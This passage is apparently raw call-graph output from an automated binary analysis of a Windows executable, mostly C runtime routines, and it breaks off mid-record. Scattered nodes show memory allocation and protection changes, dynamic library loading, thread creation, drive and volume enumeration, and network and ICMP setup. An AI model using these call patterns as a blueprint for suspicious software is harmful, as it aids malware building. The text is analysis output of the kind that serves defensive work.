afc2ce _free 14 API calls 13824->13825 13826 afbe84 13825->13826 13827 afc2ce _free 14 API calls 13826->13827 13828 afbe8f 13827->13828 13829 afc2ce _free 14 API calls 13828->13829 13830 afbe9d 13829->13830 13835 afbc47 13830->13835 13836 afbc53 ___scrt_is_nonwritable_in_current_image 13835->13836 13851 afd39c EnterCriticalSection 13836->13851 13840 afbc5d 13841 afc2ce _free 14 API calls 13840->13841 13842 afbc87 13840->13842 13841->13842 13852 afbca6 13842->13852 13843 afbcb2 13844 afbcbe ___scrt_is_nonwritable_in_current_image 13843->13844 13856 afd39c EnterCriticalSection 13844->13856 13846 afbcc8 13847 afbee8 pre_c_initialization 14 API calls 13846->13847 13848 afbcdb 13847->13848 13857 afbcfb 13848->13857 13851->13840 13855 afd3e4 LeaveCriticalSection 13852->13855 13854 afbc94 13854->13843 13855->13854 13856->13846 13860 afd3e4 LeaveCriticalSection 13857->13860 13859 afbce9 13859->13807 13860->13859 13861 ae1bfb 13862 ae1c00 13861->13862 13863 ae1c3b CreateFileA 13862->13863 13864 ae1c63 13863->13864 13867 ae1c79 13863->13867 13865 af7b30 _ValidateLocalCookies 5 API calls 13864->13865 13866 ae1c75 13865->13866 13868 af7b30 _ValidateLocalCookies 5 API calls 13867->13868 13869 ae2462 13868->13869 15394 af6ff2 15395 af6f5c 15394->15395 15396 af6f75 GetLastError 15395->15396 15397 af6f88 15395->15397 15396->15397 14158 aee4cc 14159 aee528 14158->14159 14160 aee4d7 14158->14160 14159->14160 14162 aee537 14159->14162 14161 aee4f9 CreateThread 14160->14161 14165 aeb290 14161->14165 14170 af36c0 14161->14170 14172 af3d00 14161->14172 14186 af16d0 14161->14186 14163 aee552 14162->14163 14164 aee5a8 GetFileAttributesW 14162->14164 14167 aeb2cb 14165->14167 14166 aeb2e5 14167->14166 14168 af7b30 _ValidateLocalCookies 5 API calls 14167->14168 14169 aeb3db 14168->14169 14171 af36e9 14170->14171 14171->14171 14173 af3d29 14172->14173 14174 afa4ff 37 API calls 14173->14174 14175 af3d63 14174->14175 14176 af3e07 Icmp6CreateFile 14175->14176 14177 af3e13 14176->14177 14181 af3e28 ___scrt_fastfail 14176->14181 14178 af7b30 _ValidateLocalCookies 5 API calls 14177->14178 14179 af3e22 14178->14179 14180 afa6ee ___vcrt_freefls@4 14 API calls 14180->14181 14181->14180 14182 af3ebf 14181->14182 14183 af3ec9 IcmpCloseHandle 14182->14183 14184 af7b30 _ValidateLocalCookies 5 API calls 14183->14184 14185 af3ede 14184->14185 14187 af16e3 14186->14187 14197 ae98cb 14198 ae9a74 14197->14198 14199 afa532 25 API calls 14198->14199 14206 ae9af3 14199->14206 14200 ae9c08 GetDriveTypeW 14200->14206 14201 aea0e4 14202 af7b30 _ValidateLocalCookies 5 API calls 14201->14202 14203 aea14a 14202->14203 14204 afa532 25 API calls 14204->14206 14205 afa596 25 API calls 14205->14206 14206->14200 14206->14201 14206->14204 14206->14205 14207 aef2cb 14208 aedec0 14207->14208 14209 aef2d6 WSAStartup 14208->14209 14210 aea5c2 14211 aedec0 14210->14211 14212 aea5e1 GetVolumePathNamesForVolumeNameW 14211->14212 14213 aea601 14212->14213 14232 aec7d9 14233 aec80a 14232->14233 14234 aecf57 LoadLibraryA 14233->14234 14235 aecf87 14234->14235 14236 aed071 LoadLibraryA 14235->14236 14250 aed430 14236->14250 14238 aed0c2 LoadLibraryA 14239 aed0f0 14238->14239 14240 aed140 LoadLibraryA 14239->14240 14241 aed171 14240->14241 14242 aed1ec LoadLibraryA 14241->14242 14243 aed21c 14242->14243 14244 aed302 LoadLibraryA 14243->14244 14245 aed32d 14244->14245 14246 aed35c LoadLibraryA 14245->14246 14247 aed382 14246->14247 14248 af7b30 _ValidateLocalCookies 5 API calls 14247->14248 14249 aed428 14248->14249 14251 aed472 14250->14251 14252 ae95d4 14253 ae95a9 14252->14253 14254 ae9619 VirtualAlloc 14253->14254 14256 ae95ca 14253->14256 14255 ae964b 14254->14255 14259 ae965f 14254->14259 14257 af7b30 _ValidateLocalCookies 5 API calls 14255->14257 14258 ae965b 14257->14258 14259->14259 14260 afa532 25 API calls 14259->14260 14261 ae96d0 14260->14261 14262 afa596 25 API calls 14261->14262 14263 ae972f 14261->14263 14262->14263 14264 afa596 25 API calls 14263->14264 14265 ae977c ___scrt_fastfail 14264->14265 14266 aee380 ReadFile 14265->14266 14267 ae97e3 14265->14267 14266->14267 14268 ae981c 14267->14268 14269 ae9836 FindCloseChangeNotification 14267->14269 14270 ae9846 14269->14270 14271 af7b30 _ValidateLocalCookies 5 API calls 14270->14271 14272 ae9859 14271->14272 14280 ae24d3 14284 ae24dd 14280->14284 14281 af7b30 _ValidateLocalCookies 5 API calls 14282 ae281a 14281->14282 14283 ae2535 14283->14281 14287 ae2676 14283->14287 14284->14283 14285 aeea50 VirtualProtect 14284->14285 14286 ae2492 14284->14286 14285->14283 12487 af162e 12493 af0b38 12487->12493 12488 af16ac 12495 af7b30 12488->12495 12490 af16b9 12491 afa596 25 API calls 12491->12493 12492 afa532 25 API calls 12492->12493 12493->12488 12493->12491 12493->12492 12494 aeb290 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12493->12494 12494->12493 12496 af7b3b IsProcessorFeaturePresent 12495->12496 12497 af7b39 12495->12497 12499 af7b7d 12496->12499 12497->12490 12502 af7b41 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12499->12502 12501 af7c60 12501->12490 12502->12501 12539 afac2d 12548 afd30b GetEnvironmentStringsW 12539->12548 12542 afac45 12544 afc2ce _free 14 API calls 12542->12544 12546 afac74 12544->12546 12549 afd31f 12548->12549 12550 afac3f 12548->12550 12578 afc308 12549->12578 12550->12542 12555 afac7a 12550->12555 12552 afc2ce _free 14 API calls 12554 afd34d FreeEnvironmentStringsW 12552->12554 12553 afd333 ___scrt_uninitialize_crt 12553->12552 12554->12550 12556 afac99 12555->12556 12557 afc42c pre_c_initialization 14 API calls 12556->12557 12558 afacd7 12557->12558 12561 afc42c pre_c_initialization 14 API calls 12558->12561 12562 afad58 12558->12562 12563 afad5a 12558->12563 12567 afad7a 12558->12567 12570 afc2ce _free 14 API calls 12558->12570 12799 afa532 12558->12799 12559 afc2ce _free 14 API calls 12560 afac50 12559->12560 12572 afc2ce 12560->12572 12561->12558 12562->12559 12808 afad87 12563->12808 12814 afa43f IsProcessorFeaturePresent 12567->12814 12568 afc2ce _free 14 API calls 12568->12562 12570->12558 12571 afad86 12573 afc2d9 RtlFreeHeap 12572->12573 12577 afc302 __dosmaperr 12572->12577 12574 afc2ee 12573->12574 12573->12577 12575 afa4ec __dosmaperr 12 API calls 12574->12575 12576 afc2f4 GetLastError 12575->12576 12576->12577 12577->12542 12579 afc346 12578->12579 12580 afc316 pre_c_initialization 12578->12580 12588 afa4ec 12579->12588 12580->12579 12582 afc331 RtlAllocateHeap 12580->12582 12585 afe546 12580->12585 12582->12580 12583 afc344 12582->12583 12583->12553 12591 afe573 12585->12591 12602 afc08a GetLastError 12588->12602 12590 afa4f1 12590->12583 12592 afe57f ___scrt_is_nonwritable_in_current_image 12591->12592 12597 afd39c EnterCriticalSection 12592->12597 12594 afe58a 12598 afe5c6 12594->12598 12597->12594 12601 afd3e4 LeaveCriticalSection 12598->12601 12600 afe551 12600->12580 12601->12600 12603 afc0a7 12602->12603 12604 afc0a1 12602->12604 12623 afc0ad SetLastError 12603->12623 12630 afe29a 12603->12630 12625 afe25b 12604->12625 12611 afc0dd 12613 afe29a pre_c_initialization 6 API calls 12611->12613 12612 afc0f4 12614 afe29a pre_c_initialization 6 API calls 12612->12614 12616 afc0eb 12613->12616 12615 afc100 12614->12615 12617 afc115 12615->12617 12618 afc104 12615->12618 12621 afc2ce _free 12 API calls 12616->12621 12642 afbd61 12617->12642 12619 afe29a pre_c_initialization 6 API calls 12618->12619 12619->12616 12621->12623 12623->12590 12624 afc2ce _free 12 API calls 12624->12623 12647 afe11a 12625->12647 12628 afe292 TlsGetValue 12629 afe280 12629->12603 12631 afe11a pre_c_initialization 5 API calls 12630->12631 12632 afe2b6 12631->12632 12633 afc0c5 12632->12633 12634 afe2d4 TlsSetValue 12632->12634 12633->12623 12635 afc42c 12633->12635 12640 afc439 pre_c_initialization 12635->12640 12636 afc479 12639 afa4ec __dosmaperr 13 API calls 12636->12639 12637 afc464 RtlAllocateHeap 12638 afc0d5 12637->12638 12637->12640 12638->12611 12638->12612 12639->12638 12640->12636 12640->12637 12641 afe546 pre_c_initialization 2 API calls 12640->12641 12641->12640 12661 afbbf5 12642->12661 12648 afe148 12647->12648 12649 afe144 12647->12649 12648->12649 12654 afe053 12648->12654 12649->12628 12649->12629 12652 afe162 GetProcAddress 12652->12649 12653 afe172 __crt_fast_encode_pointer 12652->12653 12653->12649 12658 afe064 try_get_first_available_module 12654->12658 12655 afe10f 12655->12649 12655->12652 12656 afe082 LoadLibraryExW 12657 afe09d GetLastError 12656->12657 12656->12658 12657->12658 12658->12655 12658->12656 12659 afe0f8 FreeLibrary 12658->12659 12660 afe0d0 LoadLibraryExW 12658->12660 12659->12658 12660->12658 12662 afbc01 ___scrt_is_nonwritable_in_current_image 12661->12662 12675 afd39c EnterCriticalSection 12662->12675 12664 afbc0b 12676 afbc3b 12664->12676 12667 afbd07 12668 afbd13 ___scrt_is_nonwritable_in_current_image 12667->12668 12680 afd39c EnterCriticalSection 12668->12680 12670 afbd1d 12681 afbee8 12670->12681 12672 afbd35 12685 afbd55 12672->12685 12675->12664 12679 afd3e4 LeaveCriticalSection 12676->12679 12678 afbc29 12678->12667 12679->12678 12680->12670 12682 afbf1e pre_c_initialization 12681->12682 12683 afbef7 pre_c_initialization 12681->12683 12682->12672 12683->12682 12688 afdd02 12683->12688 12798 afd3e4 LeaveCriticalSection 12685->12798 12687 afbd43 12687->12624 12690 afdd82 12688->12690 12691 afdd18 12688->12691 12693 afc2ce _free 14 API calls 12690->12693 12714 afddd0 12690->12714 12691->12690 12697 afdd4b 12691->12697 12699 afc2ce _free 14 API calls 12691->12699 12692 afddde 12703 afde3e 12692->12703 12712 afc2ce 14 API calls _free 12692->12712 12694 afdda4 12693->12694 12695 afc2ce _free 14 API calls 12694->12695 12696 afddb7 12695->12696 12700 afc2ce _free 14 API calls 12696->12700 12701 afc2ce _free 14 API calls 12697->12701 12715 afdd6d 12697->12715 12698 afc2ce _free 14 API calls 12702 afdd77 12698->12702 12704 afdd40 12699->12704 12705 afddc5 12700->12705 12706 afdd62 12701->12706 12707 afc2ce _free 14 API calls 12702->12707 12708 afc2ce _free 14 API calls 12703->12708 12716 afd8b1 12704->12716 12710 afc2ce _free 14 API calls 12705->12710 12744 afd9af 12706->12744 12707->12690 12713 afde44 12708->12713 12710->12714 12712->12692 12713->12682 12756 afde73 12714->12756 12715->12698 12717 afd8c2 12716->12717 12743 afd9ab 12716->12743 12718 afd8d3 12717->12718 12719 afc2ce _free 14 API calls 12717->12719 12720 afc2ce _free 14 API calls 12718->12720 12723 afd8e5 12718->12723 12719->12718 12720->12723 12721 afd909 12726 afd91b 12721->12726 12727 afc2ce _free 14 API calls 12721->12727 12722 afd8f7 12722->12721 12725 afc2ce _free 14 API calls 12722->12725 12723->12722 12724 afc2ce _free 14 API calls 12723->12724 12724->12722 12725->12721 12728 afd92d 12726->12728 12729 afc2ce _free 14 API calls 12726->12729 12727->12726 12730 afd93f 12728->12730 12732 afc2ce _free 14 API calls 12728->12732 12729->12728 12731 afd951 12730->12731 12733 afc2ce _free 14 API calls 12730->12733 12734 afd963 12731->12734 12735 afc2ce _free 14 API calls 12731->12735 12732->12730 12733->12731 12736 afd975 12734->12736 12737 afc2ce _free 14 API calls 12734->12737 12735->12734 12738 afd987 12736->12738 12740 afc2ce _free 14 API calls 12736->12740 12737->12736 12739 afd999 12738->12739 12741 afc2ce _free 14 API calls 12738->12741 12742 afc2ce _free 14 API calls 12739->12742 12739->12743 12740->12738 12741->12739 12742->12743 12743->12697 12745 afd9bc 12744->12745 12755 afda14 12744->12755 12746 afd9cc 12745->12746 12747 afc2ce _free 14 API calls 12745->12747 12748 afc2ce _free 14 API calls 12746->12748 12751 afd9de 12746->12751 12747->12746 12748->12751 12749 afc2ce _free 14 API calls 12752 afd9f0 12749->12752 12750 afda02 12754 afc2ce _free 14 API calls 12750->12754 12750->12755 12751->12749 12751->12752 12752->12750 12753 afc2ce _free 14 API calls 12752->12753 12753->12750 12754->12755 12755->12715 12757 afde80 12756->12757 12761 afde9f 12756->12761 12757->12761 12762 afda50 12757->12762 12760 afc2ce _free 14 API calls 12760->12761 12761->12692 12763 afdb2e 12762->12763 12764 afda61 12762->12764 12763->12760 12765 afda18 pre_c_initialization 14 API calls 12764->12765 12766 afda69 12765->12766 12767 afda18 pre_c_initialization 14 API calls 12766->12767 12768 afda74 12767->12768 12769 afda18 pre_c_initialization 14 API calls 12768->12769 12770 afda7f 12769->12770 12771 afda18 pre_c_initialization 14 API calls 12770->12771 12772 afda8a 12771->12772 12773 afda18 pre_c_initialization 14 API calls 12772->12773 12774 afda98 12773->12774 12775 afc2ce _free 14 API calls 12774->12775 12776 afdaa3 12775->12776 12777 afc2ce _free 14 API calls 12776->12777 12778 afdaae 12777->12778 12779 afc2ce _free 14 API calls 12778->12779 12780 afdab9 12779->12780 12781 afda18 pre_c_initialization 14 API calls 12780->12781 12782 afdac7 12781->12782 12783 afda18 pre_c_initialization 14 API calls 12782->12783 12784 afdad5 12783->12784 12785 afda18 pre_c_initialization 14 API calls 12784->12785 12786 afdae6 12785->12786 12787 afda18 pre_c_initialization 14 API calls 12786->12787 12788 afdaf4 12787->12788 12789 afda18 pre_c_initialization 14 API calls 12788->12789 12790 afdb02 12789->12790 12791 afc2ce _free 14 API calls 12790->12791 12792 afdb0d 12791->12792 12793 afc2ce _free 14 API calls 12792->12793 12794 afdb18 12793->12794 12795 afc2ce _free 14 API calls 12794->12795 12796 afdb23 12795->12796 12797 afc2ce _free 14 API calls 12796->12797 12797->12763 12798->12687 12800 afa53f 12799->12800 12801 afa54d 12799->12801 12800->12801 12806 afa566 12800->12806 12802 afa4ec __dosmaperr 14 API calls 12801->12802 12803 afa557 12802->12803 12818 afa42f 12803->12818 12805 afa561 12805->12558 12806->12805 12807 afa4ec __dosmaperr 14 API calls 12806->12807 12807->12803 12809 afad94 12808->12809 12810 afad60 12808->12810 12811 afadab 12809->12811 12812 afc2ce _free 14 API calls 12809->12812 12810->12568 12813 afc2ce _free 14 API calls 12811->12813 12812->12809 12813->12810 12815 afa44b 12814->12815 12829 afa283 12815->12829 12821 afa3cb 12818->12821 12820 afa43b 12820->12805 12822 afc08a __dosmaperr 14 API calls 12821->12822 12823 afa3d6 12822->12823 12824 afa3e4 12823->12824 12825 afa43f pre_c_initialization 11 API calls 12823->12825 12824->12820 12826 afa42e 12825->12826 12827 afa3cb pre_c_initialization 25 API calls 12826->12827 12828 afa43b 12827->12828 12828->12820 12830 afa29f ___scrt_fastfail 12829->12830 12831 afa2cb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12830->12831 12832 afa39c ___scrt_fastfail 12831->12832 12833 af7b30 _ValidateLocalCookies 5 API calls 12832->12833 12834 afa3ba GetCurrentProcess TerminateProcess 12833->12834 12834->12571 12843 aeb929 12846 afa596 12843->12846 12845 aeb941 12847 afa5a5 12846->12847 12849 afa5b3 12846->12849 12847->12849 12853 afa5e3 12847->12853 12848 afa4ec __dosmaperr 14 API calls 12850 afa5bd 12848->12850 12849->12848 12851 afa42f pre_c_initialization 25 API calls 12850->12851 12852 afa5c7 12851->12852 12852->12845 12853->12852 12854 afa4ec __dosmaperr 14 API calls 12853->12854 12854->12850 12855 ae1929 12856 ae192f 12855->12856 12856->12856 12857 ae1947 K32GetModuleFileNameExA 12856->12857 12859 ae18e0 12857->12859 12863 ae1969 12857->12863 12860 ae1a3f 12859->12860 12861 ae1a59 FindCloseChangeNotification 12859->12861 12864 ae1a63 12861->12864 12863->12859 12867 ae1280 12863->12867 12875 ae2820 12863->12875 12865 af7b30 _ValidateLocalCookies 5 API calls 12864->12865 12866 ae1ab4 12865->12866 12868 ae129d 12867->12868 12871 ae1240 12868->12871 12873 ae12df 12868->12873 12869 afa160 42 API calls 12869->12873 12870 ae126b 12870->12863 12871->12870 12872 afa160 42 API calls 12871->12872 12872->12871 12873->12869 12874 ae1346 12873->12874 12874->12863 12877 ae2843 12875->12877 12876 ae1280 42 API calls 12876->12877 12877->12875 12877->12876 12878 ae2804 12877->12878 12878->12863 12880 af7d27 12881 af7d33 ___scrt_is_nonwritable_in_current_image 12880->12881 12905 af7f40 12881->12905 12883 af7d3a 12884 af7e8d 12883->12884 12894 af7d64 pre_c_initialization ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 12883->12894 12934 af825e IsProcessorFeaturePresent 12884->12934 12886 af7e94 12938 afb1aa 12886->12938 12891 af7d83 12892 af7e04 12913 af8378 12892->12913 12894->12891 12894->12892 12917 afb184 12894->12917 12896 af7e0a 12897 af7e1f 12896->12897 12923 af83ae GetModuleHandleW 12897->12923 12900 af7e2a 12901 af7e33 12900->12901 12925 afb15f 12900->12925 12928 af80cf 12901->12928 12906 af7f49 12905->12906 12944 af84fb IsProcessorFeaturePresent 12906->12944 12910 af7f5a 12911 af7f5e 12910->12911 12955 af8b90 12910->12955 12911->12883 13022 af8bb0 12913->13022 12916 af839e 12916->12896 12918 afb19a pre_c_initialization ___scrt_is_nonwritable_in_current_image 12917->12918 12918->12892 13024 afbf33 GetLastError 12918->13024 12924 af7e26 12923->12924 12924->12886 12924->12900 13113 afb048 12925->13113 12929 af80db 12928->12929 12933 af7e3b 12929->12933 13181 afb7a0 12929->13181 12931 af80e9 12932 af8b90 ___vcrt_uninitialize 8 API calls 12931->12932 12932->12933 12933->12891 12935 af8273 ___scrt_fastfail 12934->12935 12936 af831e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12935->12936 12937 af8369 ___scrt_fastfail 12936->12937 12937->12886 12939 afb048 pre_c_initialization 23 API calls 12938->12939 12940 af7e9a 12939->12940 12941 afb16e 12940->12941 12942 afb048 pre_c_initialization 23 API calls 12941->12942 12943 af7ea2 12942->12943 12945 af7f55 12944->12945 12946 af8b67 12945->12946 12947 af8b6c ___vcrt_initialize_winapi_thunks 12946->12947 12963 af8f97 12947->12963 12951 af8b8d 12951->12910 12952 af8b82 12952->12951 12977 af8fd3 12952->12977 12954 af8b7a 12954->12910 12956 af8b99 12955->12956 12962 af8baa 12955->12962 12957 af8d59 ___vcrt_uninitialize_ptd 6 API calls 12956->12957 12958 af8b9e 12957->12958 12959 af8fd3 ___vcrt_uninitialize_locks DeleteCriticalSection 12958->12959 12960 af8ba3 12959->12960 13018 af9259 12960->13018 12962->12911 12966 af8fa0 12963->12966 12965 af8fc9 12968 af8fd3 ___vcrt_uninitialize_locks DeleteCriticalSection 12965->12968 12966->12965 12967 af8b76 12966->12967 12981 af91e9 12966->12981 12967->12954 12969 af8d26 12967->12969 12968->12967 12999 af9135 12969->12999 12972 af8d3b 12972->12952 12975 af8d56 12975->12952 12978 af8ffd 12977->12978 12979 af8fde 12977->12979 12978->12954 12980 af8fe8 DeleteCriticalSection 12979->12980 12980->12978 12980->12980 12986 af90c6 12981->12986 12983 af9203 12984 af9221 InitializeCriticalSectionAndSpinCount 12983->12984 12985 af920c 12983->12985 12984->12985 12985->12966 12987 af90ee 12986->12987 12991 af90ea __crt_fast_encode_pointer 12986->12991 12987->12991 12992 af9002 12987->12992 12990 af9108 GetProcAddress 12990->12991 12991->12983 12997 af9011 try_get_first_available_module 12992->12997 12993 af90bb 12993->12990 12993->12991 12994 af902e LoadLibraryExW 12995 af9049 GetLastError 12994->12995 12994->12997 12995->12997 12996 af90a4 FreeLibrary 12996->12997 12997->12993 12997->12994 12997->12996 12998 af907c LoadLibraryExW 12997->12998 12998->12997 13000 af90c6 try_get_function 5 API calls 12999->13000 13001 af914f 13000->13001 13002 af9168 TlsAlloc 13001->13002 13003 af8d30 13001->13003 13003->12972 13004 af91ab 13003->13004 13005 af90c6 try_get_function 5 API calls 13004->13005 13006 af91c5 13005->13006 13007 af91e0 TlsSetValue 13006->13007 13008 af8d49 13006->13008 13007->13008 13008->12975 13009 af8d59 13008->13009 13010 af8d63 13009->13010 13011 af8d69 13009->13011 13013 af9170 13010->13013 13011->12972 13014 af90c6 try_get_function 5 API calls 13013->13014 13015 af918a 13014->13015 13016 af91a2 TlsFree 13015->13016 13017 af9196 13015->13017 13016->13017 13017->13011 13019 af9288 13018->13019 13020 af9262 13018->13020 13019->12962 13020->13019 13021 af9272 FreeLibrary 13020->13021 13021->13020 13023 af838b GetStartupInfoW 13022->13023 13023->12916 13025 afbf4a 13024->13025 13026 afbf50 13024->13026 13027 afe25b pre_c_initialization 6 API calls 13025->13027 13028 afe29a pre_c_initialization 6 API calls 13026->13028 13049 afbf56 SetLastError 13026->13049 13027->13026 13029 afbf6e 13028->13029 13030 afc42c pre_c_initialization 14 API calls 13029->13030 13029->13049 13031 afbf7e 13030->13031 13033 afbf9d 13031->13033 13034 afbf86 13031->13034 13039 afe29a pre_c_initialization 6 API calls 13033->13039 13037 afe29a pre_c_initialization 6 API calls 13034->13037 13035 afbfea 13038 afb86b pre_c_initialization 35 API calls 13035->13038 13036 afb840 13051 afb86b 13036->13051 13040 afbf94 13037->13040 13041 afbfef 13038->13041 13042 afbfa9 13039->13042 13045 afc2ce _free 14 API calls 13040->13045 13043 afbfbe 13042->13043 13044 afbfad 13042->13044 13047 afbd61 pre_c_initialization 14 API calls 13043->13047 13046 afe29a pre_c_initialization 6 API calls 13044->13046 13045->13049 13046->13040 13048 afbfc9 13047->13048 13050 afc2ce _free 14 API calls 13048->13050 13049->13035 13049->13036 13050->13049 13062 afe69d 13051->13062 13054 afb87b 13056 afb885 IsProcessorFeaturePresent 13054->13056 13061 afb8a4 13054->13061 13057 afb891 13056->13057 13059 afa283 pre_c_initialization 8 API calls 13057->13059 13058 afb16e pre_c_initialization 23 API calls 13060 afb8ae 13058->13060 13059->13061 13061->13058 13092 afe5cf 13062->13092 13065 afe6eb 13066 afe6f7 ___scrt_is_nonwritable_in_current_image 13065->13066 13067 afc08a __dosmaperr 14 API calls 13066->13067 13069 afe71e pre_c_initialization 13066->13069 13072 afe724 pre_c_initialization 13066->13072 13067->13069 13068 afe769 13070 afa4ec __dosmaperr 14 API calls 13068->13070 13069->13068 13069->13072 13091 afe753 13069->13091 13071 afe76e 13070->13071 13073 afa42f pre_c_initialization 25 API calls 13071->13073 13075 afe795 13072->13075 13103 afd39c EnterCriticalSection 13072->13103 13073->13091 13077 afe7dd 13075->13077 13078 afe8d2 13075->13078 13088 afe808 13075->13088 13077->13088 13104 afe6e2 13077->13104 13079 afe8dd 13078->13079 13111 afd3e4 LeaveCriticalSection 13078->13111 13082 afb16e pre_c_initialization 23 API calls 13079->13082 13084 afe8e5 13082->13084 13085 afbf33 pre_c_initialization 37 API calls 13089 afe85c 13085->13089 13087 afe6e2 pre_c_initialization 37 API calls 13087->13088 13107 afe87e 13088->13107 13090 afbf33 pre_c_initialization 37 API calls 13089->13090 13089->13091 13090->13091 13091->13054 13093 afe5db ___scrt_is_nonwritable_in_current_image 13092->13093 13098 afd39c EnterCriticalSection 13093->13098 13095 afe5e9 13099 afe627 13095->13099 13098->13095 13102 afd3e4 LeaveCriticalSection 13099->13102 13101 afb870 13101->13054 13101->13065 13102->13101 13103->13075 13105 afbf33 pre_c_initialization 37 API calls 13104->13105 13106 afe6e7 13105->13106 13106->13087 13108 afe84d 13107->13108 13109 afe884 13107->13109 13108->13085 13108->13089 13108->13091 13112 afd3e4 LeaveCriticalSection 13109->13112 13111->13079 13112->13108 13114 afb056 13113->13114 13122 afb067 13113->13122 13115 af83ae pre_c_initialization GetModuleHandleW 13114->13115 13117 afb05b 13115->13117 13117->13122 13124 afb0ee GetModuleHandleExW 13117->13124 13119 afb0a1 13119->12901 13129 afaf0e 13122->13129 13125 afb10d GetProcAddress 13124->13125 13126 afb122 13124->13126 13125->13126 13127 afb13f 13126->13127 13128 afb136 FreeLibrary 13126->13128 13127->13122 13128->13127 13130 afaf1a ___scrt_is_nonwritable_in_current_image 13129->13130 13145 afd39c EnterCriticalSection 13130->13145 13132 afaf24 13146 afaf5b 13132->13146 13134 afaf31 13150 afaf4f 13134->13150 13137 afb0ac 13174 afd3fb GetPEB 13137->13174 13140 afb0db 13143 afb0ee pre_c_initialization 3 API calls 13140->13143 13141 afb0bb GetPEB 13141->13140 13142 afb0cb GetCurrentProcess TerminateProcess 13141->13142 13142->13140 13144 afb0e3 ExitProcess 13143->13144 13145->13132 13147 afaf67 ___scrt_is_nonwritable_in_current_image 13146->13147 13148 afafc8 pre_c_initialization 13147->13148 13153 afb60a 13147->13153 13148->13134 13173 afd3e4 LeaveCriticalSection 13150->13173 13152 afaf3d 13152->13119 13152->13137 13156 afb33b 13153->13156 13157 afb347 ___scrt_is_nonwritable_in_current_image 13156->13157 13164 afd39c EnterCriticalSection 13157->13164 13159 afb355 13165 afb51a 13159->13165 13164->13159 13166 afb539 13165->13166 13167 afb362 13165->13167 13166->13167 13168 afc2ce _free 14 API calls 13166->13168 13169 afb38a 13167->13169 13168->13167 13172 afd3e4 LeaveCriticalSection 13169->13172 13171 afb373 13171->13148 13172->13171 13173->13152 13175 afd415 13174->13175 13176 afb0b6 13174->13176 13178 afe19d 13175->13178 13176->13140 13176->13141 13179 afe11a pre_c_initialization 5 API calls 13178->13179 13180 afe1b9 13179->13180 13180->13176 13182 afb7ab 13181->13182 13184 afb7bd ___scrt_uninitialize_crt 13181->13184 13183 afb7b9 13182->13183 13186 afeb70 13182->13186 13183->12931 13184->12931 13189 afea1e 13186->13189 13192 afe972 13189->13192 13193 afe97e ___scrt_is_nonwritable_in_current_image 13192->13193 13200 afd39c EnterCriticalSection 13193->13200 13195 afe9f4 13209 afea12 13195->13209 13199 afe988 ___scrt_uninitialize_crt 13199->13195 13201 afe8e6 13199->13201 13200->13199 13202 afe8f2 ___scrt_is_nonwritable_in_current_image 13201->13202 13212 afec8d EnterCriticalSection 13202->13212 13204 afe948 13223 afe966 13204->13223 13205 afe8fc ___scrt_uninitialize_crt 13205->13204 13213 afeb28 13205->13213 13356 afd3e4 LeaveCriticalSection 13209->13356 13211 afea00 13211->13183 13212->13205 13214 afeb3e 13213->13214 13215 afeb35 13213->13215 13226 afeac3 13214->13226 13216 afea1e ___scrt_uninitialize_crt 66 API calls 13215->13216 13219 afeb3b 13216->13219 13219->13204 13221 afeb5a 13239 aff988 13221->13239 13355 afeca1 LeaveCriticalSection 13223->13355 13225 afe954 13225->13199 13227 afeadb 13226->13227 13231 afeb00 13226->13231 13228 aff257 ___scrt_uninitialize_crt 25 API calls 13227->13228 13227->13231 13229 afeaf9 13228->13229 13250 b0017e 13229->13250 13231->13219 13232 aff257 13231->13232 13233 aff278 13232->13233 13234 aff263 13232->13234 13233->13221 13235 afa4ec __dosmaperr 14 API calls 13234->13235 13236 aff268 13235->13236 13237 afa42f pre_c_initialization 25 API calls 13236->13237 13238 aff273 13237->13238 13238->13221 13240 aff999 13239->13240 13243 aff9a6 13239->13243 13241 afa4ec __dosmaperr 14 API calls 13240->13241 13249 aff99e 13241->13249 13242 aff9ef 13244 afa4ec __dosmaperr 14 API calls 13242->13244 13243->13242 13246 aff9cd 13243->13246 13245 aff9f4 13244->13245 13247 afa42f pre_c_initialization 25 API calls 13245->13247 13324 aff8e6 13246->13324 13247->13249 13249->13219 13251 b0018a ___scrt_is_nonwritable_in_current_image 13250->13251 13252 b00192 13251->13252 13253 b001aa 13251->13253 13275 afa4d9 13252->13275 13254 b00245 13253->13254 13258 b001dc 13253->13258 13256 afa4d9 __dosmaperr 14 API calls 13254->13256 13259 b0024a 13256->13259 13278 afd57a EnterCriticalSection 13258->13278 13262 afa4ec __dosmaperr 14 API calls 13259->13262 13260 afa4ec __dosmaperr 14 API calls 13274 b0019f 13260->13274 13264 b00252 13262->13264 13263 b001e2 13265 b00213 13263->13265 13266 b001fe 13263->13266 13267 afa42f pre_c_initialization 25 API calls 13264->13267 13279 b00270 13265->13279 13268 afa4ec __dosmaperr 14 API calls 13266->13268 13267->13274 13270 b00203 13268->13270 13272 afa4d9 __dosmaperr 14 API calls 13270->13272 13271 b0020e 13321 b0023d 13271->13321 13272->13271 13274->13231 13276 afc08a __dosmaperr 14 API calls 13275->13276 13277 afa4de 13276->13277 13277->13260 13278->13263 13280 b00292 13279->13280 13317 b002ae 13279->13317 13281 b00296 13280->13281 13284 b002e6 13280->13284 13282 afa4d9 __dosmaperr 14 API calls 13281->13282 13283 b0029b 13282->13283 13285 afa4ec __dosmaperr 14 API calls 13283->13285 13286 b002f9 13284->13286 13287 b008b9 ___scrt_uninitialize_crt 27 API calls 13284->13287 13289 b002a3 13285->13289 13288 affe17 ___scrt_uninitialize_crt 38 API calls 13286->13288 13287->13286 13290 b0030a 13288->13290 13291 afa42f pre_c_initialization 25 API calls 13289->13291 13292 b0034e 13290->13292 13293 b0030f 13290->13293 13291->13317 13296 b00362 13292->13296 13297 b003a7 WriteFile 13292->13297 13294 b00313 13293->13294 13295 b00338 13293->13295 13304 affdaf ___scrt_uninitialize_crt 6 API calls 13294->13304 13306 b0032e 13294->13306 13300 affa05 ___scrt_uninitialize_crt 43 API calls 13295->13300 13298 b00397 13296->13298 13299 b0036d 13296->13299 13301 b003cb GetLastError 13297->13301 13297->13306 13305 affe88 ___scrt_uninitialize_crt 7 API calls 13298->13305 13302 b00372 13299->13302 13303 b00387 13299->13303 13300->13306 13301->13306 13302->13306 13310 afff63 